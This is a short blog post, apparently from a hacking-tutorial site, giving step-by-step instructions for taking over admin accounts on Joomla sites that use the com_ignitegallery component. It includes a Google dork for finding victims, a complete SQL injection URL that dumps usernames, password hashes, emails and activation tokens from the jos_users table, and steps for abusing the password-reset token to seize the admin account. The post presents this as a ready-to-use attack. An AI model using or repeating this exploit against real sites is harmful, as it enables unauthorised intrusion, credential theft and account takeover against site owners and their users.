Vulnerable on "com_ignitegallery"


Here the steps :
  1. Find target on Google using this dork --> inurl:index.php?option=com_ignitegallery
    Example --> http://target.com/index.php?option=com_ignitegallery&Itemid=57
  2. Make some adjustment and put the red-long-url at the back of the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
    Example --> http://target/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--
  3. Focus on the change -->
    target:89143e2af0df46bd73034bba7caf27e4:OqGo1BDqKhOz7nPI18Xf3JSILKwsEe9s:target@gmail.com:
  4. Make another adjustment on the url again and put this --> ?option=com_user&view=reset
    Example --> http://target.com/index.php?option=com_user&view=reset
  5. Insert the target's email
    Example --> target@gmail.com
  6. Open new tab on the browser, make adjustment on the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
    Example --> http://target.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--
  7. Insert the target's token Example --> 89143e2af0df46bd73034bba7caf27e4
    ** Where you find the token? follow the colour that i have matched above.
Finish! It will reset the admin password.


Happy trying and enjoy hacking. :)

0 comments

Post a Comment

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me